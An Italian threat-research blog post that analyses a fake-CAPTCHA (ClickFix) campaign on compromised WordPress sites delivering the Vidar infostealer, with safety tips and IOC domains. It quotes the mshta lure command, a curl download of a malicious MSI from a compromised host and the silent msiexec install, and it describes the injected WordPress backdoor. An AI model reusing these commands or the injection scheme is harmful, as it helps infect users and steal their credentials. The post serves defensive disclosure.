I siti compromessi diffondono il malware Vidar tra Windows

| 16 marzo 2026
Siti web compromessi

Negli ultimi anni, ClickFix e le tecniche basate su CAPTCHA fasulli sono diventate uno dei metodi più diffusi tra i criminali informatici per diffondere malware. Anziché sfruttare una vulnerabilità tecnica, questi attacchi puntano a convincere gli utenti a eseguire autonomamente comandi dannosi.

I nostri ricercatori hanno recentemente individuato una campagna che, attraverso diverse catene di infezione, porta infine all'installazione dell'infostealer Vidar.

Uno dei metodi utilizzati in questa campagna prevede l'installazione di un programma di installazione dannoso diffuso tramite pagine CAPTCHA fasulle ospitate su siti web WordPress compromessi. Abbiamo individuato diversi siti web compromessi coinvolti nella campagna, situati in paesi quali Italia, Francia, Stati Uniti, Regno Unito e Brasile.

Cos'è Vidar?

Vidar è una nota famiglia di malware di tipo infostealer progettata per sottrarre dati sensibili dai sistemi infetti. In genere prende di mira:

  • Nomi utente e password salvati nel browser
  • Informazioni sul portafoglio di criptovalute
  • Cookie di sessione e token di autenticazione
  • Dati di compilazione automatica e informazioni di pagamento salvate
  • File che potrebbero contenere dati sensibili

Poiché Vidar si carica in memoria e comunica con server di comando remoti, è in grado di raccogliere ed esfiltrare dati in modo silenzioso, senza lasciare segni evidenti di infezione.

CAPTCHA fasulli: una storia senza fine

Quando un utente visita un sito web compromesso, potrebbe visualizzare una schermata che imita la nota pagina di Cloudflare «Verifica che sei un utente umano».

Questa tecnica è ampiamente utilizzata dal 2024 e nel corso del tempo si è evoluta attraverso numerose varianti, sia nell'aspetto visivo che nei comandi dannosi che danno inizio alla catena di infezione.

Verifica di essere un utente umano
Il messaggio CAPTCHA falso mostrato all'utente.

La pagina invita il visitatore a copiare ed eseguire un comando dannoso che avvia la catena di infezione, in questo caso:

mshta https://{compromised website}/challenge/cf

Mshta è un Windows legittimo Windows progettato per eseguire le applicazioni HTML di Microsoft (HTA). Poiché è integrato in Windows, gli hacker ne hanno abusato sin dai primi tempi delle campagne ClickFix.

In questo caso, il comando avvia un semplice script HTA offuscato, che alla fine scarica e installa un malware associato all'infostealer Vidar.

Dropper MSI basato su HTA

Lo script HTA costituisce la fase intermedia che scarica ed esegue un programma di installazione MSI dannoso. Un MSI è un pacchetto Windows normalmente utilizzato per installare software, ma gli hacker lo sfruttano spesso per diffondere malware.

Lo script esegue diverse operazioni:

  • La finestra viene ridimensionata a 0x0 e spostata fuori dallo schermo, rendendo l'applicazione invisibile all'utente.
  • Lo script termina se il document.location.href non inizia con http.
  • Le stringhe vengono decodificate utilizzando l'operazione XOR e una chiave casuale.
  • Tramite query WMI, lo script verifica la presenza di prodotti antivirus installati.
  • Crea cartelle di lavoro nascoste in una cartella casuale all'interno di \AppData\Local per trascinare il file MSI.
  • Alla fine, lo script scarica il file MSI dannoso da un sito web compromesso. Il file scaricato deve avere una dimensione superiore a 100 KB per essere considerato valido. Infine, rimuove il :Zone.Identifier flusso di dati alternativo.
Lo script HTA dannoso
Lo script HTA dannoso.

In questo caso, il file MSI dannoso è stato scaricato utilizzando il seguente comando:

C:\Windows\System32\curl.exe" -s -L -oC:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msihttps://{compromised-website}/474a2b77/5ef46f21e2.msi

Successivamente, il file MSI dannoso è stato eseguito con:

"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msi" /qn

MSI e il caricatore GoLang

Il file MSI definisce un'azione personalizzata denominata ConfigureNetFx ed esegue un caricatore GoLang.

I loader di malware (noti anche come dropper o downloader) sono strumenti comunemente utilizzati nell'ecosistema della criminalità informatica. Il loro compito principale è quello di compromettere un sistema in modo furtivo per poi distribuire uno o più payload di malware aggiuntivi.

In questa campagna, il loader alla fine decrittografa ed esegue il programma di furto di informazioni Vidar. Il file eseguibile presenta nomi diversi nei vari campioni MSI analizzati.

L'azione personalizzata definita nel file MSI.
L'azione personalizzata definita nel file MSI.

Il caricatore Golang decodifica uno shellcode che esegue diversi controlli anti-analisi, tra cui:

CheckRemoteDebuggerPresent

IsDebuggerPresent

QueryPerformanceCounter

GetTickCount

Dopo diverse fasi intermedie, il programma di caricamento decrittografa e carica l’infostealer Vidar direttamente in memoria.

Analisi dei siti web compromessi

L'iframe dannoso inserito nei siti web compromessi è stato generato dai domini cdnwoopress[.]com o woopresscdn[.]com nei casi analizzati.

L'iframe dannoso inserito nel sito web compromesso.
L'iframe dannoso inserito nel sito web compromesso.

Il codice iniettato svolge diverse funzioni, e il comando utilizzato nell'attacco con CAPTCHA fasullo viene ricavato dal /api/get_payload punto finale.

Codice inserito nei siti web compromessi.
Codice inserito nei siti web compromessi.

Poiché il sito web dannoso era stato configurato in modo errato, siamo riusciti a visualizzare il codice backend inserito nei siti WordPress compromessi.

Lo script iniettato esegue diverse operazioni:

  • Crea il file wp-cache-manager.php se non esiste già, recuperare il suo contenuto dall'endpoint /api/plugin.
  • Invia ogni ora una richiesta di heartbeat contenente il nome di dominio, l'URL del sito, la versione di WordPress e lo stato.
  • Durante il caricamento delle pagine (template_redirect), lo script filtra i visitatori in base all'User-Agent e si rivolge a chi utilizza Windows .
  • Richieste /api/inject?domain=domain dal server di comando remoto. Il codice HTML della risposta viene quindi visualizzato, sostituendo la normale pagina di WordPress.
Il codice dannoso inserito nel sito WordPress compromesso.
Il codice dannoso inserito nel sito WordPress compromesso.

Come stare al sicuro

Attacchi di questo tipo si basano sull 'inganno, in modo da indurre le persone a eseguire direttamente i comandi; pertanto, alcune semplici precauzioni possono fare una grande differenza.

  • Prenditi un attimo di tempo. Se una pagina web ti chiede di eseguire comandi sul tuo dispositivo o di copiare e incollare del codice, fermati un attimo a riflettere prima di seguire le istruzioni. I criminali informatici spesso creano un senso di urgenza ricorrendo a falsi controlli di sicurezza, timer con conto alla rovescia o avvisi pensati per indurti ad agire d'impulso.
  • Non eseguire mai comandi provenienti da fonti non attendibili. Un sito web legittimo non dovrebbe mai richiederti di premere Win+R, aprire il Terminale o incollare comandi in PowerShell solo per verificare che tu sia un essere umano. Se una pagina ti chiede di farlo, considerala sospetta.
  • Verifica le istruzioni autonomamente. Se un sito web ti chiede di eseguire un comando o di compiere un'operazione tecnica, consulta la documentazione ufficiale o contatta l'assistenza tramite canali affidabili prima di procedere.
  • Presta attenzione quando utilizzi il copia e incolla. Alcuni attacchi nascondono comandi dannosi nel testo copiato. Se dovessi mai dover eseguire un comando tratto dalla documentazione, digitarlo manualmente può aiutarti a ridurre il rischio di eseguire codice nascosto.
  • Proteggi il tuo dispositivo. Mantieni aggiornati il sistema operativo e il browser e utilizza un software di sicurezza in grado di bloccare i siti web dannosi e rilevare i malware di tipo "infostealer".
  • Rimani aggiornato. Tecniche come le pagine CAPTCHA fasulle e gli attacchi ClickFix continuano a evolversi. Sapere che gli hacker potrebbero cercare di indurti a eseguire comandi di tua iniziativa può aiutarti a individuare queste truffe prima che abbiano successo.

Consiglio da esperto: Il programma gratuito Malwarebytes Browser Guard può avvisarti se un sito web tenta di copiare contenuti negli appunti, il che può aiutare a prevenire questo tipo di attacco.

Indicatori di compromesso (IOC)

Domini

  • cdnwoopress[.]com: Infrastruttura CAPTCHA fittizia
  • woopresscdn[.]com: Infrastruttura CAPTCHA fasulla
  • walwood[.]be: Infrastruttura CAPTCHA fasulla
  • telegram[.]me/dikkh0k: Vidar C2
  • telegram[.]me/pr55ii: Vidar C2
  • steamcommunity[.]com/profiles/76561198742377525: Vidar C2
  • steamcommunity[.]com/profiles/76561198735736086: Vidar C2

Non ci limitiamo a segnalare le minacce, ma le eliminiamo.

I rischi per la sicurezza informatica non dovrebbero mai diffondersi al di là di un titolo di giornale. Tenete le minacce lontane dai vostri dispositivi scaricando Malwarebytes oggi stesso.

Informazioni sull'autore

Gabriele è un ingegnere specializzato nella ricerca sul malware che ama combattere il malware. Quando non è impegnato in questo, lo si può trovare a godersi la natura, l'arte e gli animali.